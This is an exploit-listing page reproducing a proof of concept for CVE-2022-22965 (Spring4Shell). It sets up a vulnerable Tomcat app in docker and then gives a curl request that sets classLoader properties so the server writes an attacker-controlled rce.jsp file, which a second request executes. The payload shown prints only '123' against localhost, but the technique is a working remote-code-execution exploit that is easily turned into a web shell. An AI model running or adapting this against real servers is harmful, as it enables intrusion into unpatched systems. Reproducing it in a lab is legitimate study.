Exploit for CVE-2022-22965 exploit

Share

## https://sploitus.com/exploit?id=608612F7-69E9-5491-B453-5DE098B798CA # CVE-2022-22965 PoC Minimal example of how to reproduce CVE-2022-22965 Spring RCE. ## 1. Run the Tomcat server ```shell docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0 ``` _Add `-p 5005:5005 -e "JAVA_OPTS=-Xdebug -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005"` if you want to debug remotely._ ## 2. Build the project ```shell ./mvnw install ``` ## 3. Deploy the app ```shell docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps ``` ## 4. Write the exploit ```shell curl -X POST \ -H "pre:<%" \ -H "post:;%>" \ -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \ -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \ -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \ -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \ -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \ http://localhost:8888/handling-form-submission-complete/greeting ``` The exploit is going to create `rce.jsp` file in `webapps/handling-form-submission-complete` on the web server. ## Use the exploit ```shell curl http://localhost:8888/handling-form-submission-complete/rce.jsp ``` Now you'll see `123` in the container's terminal.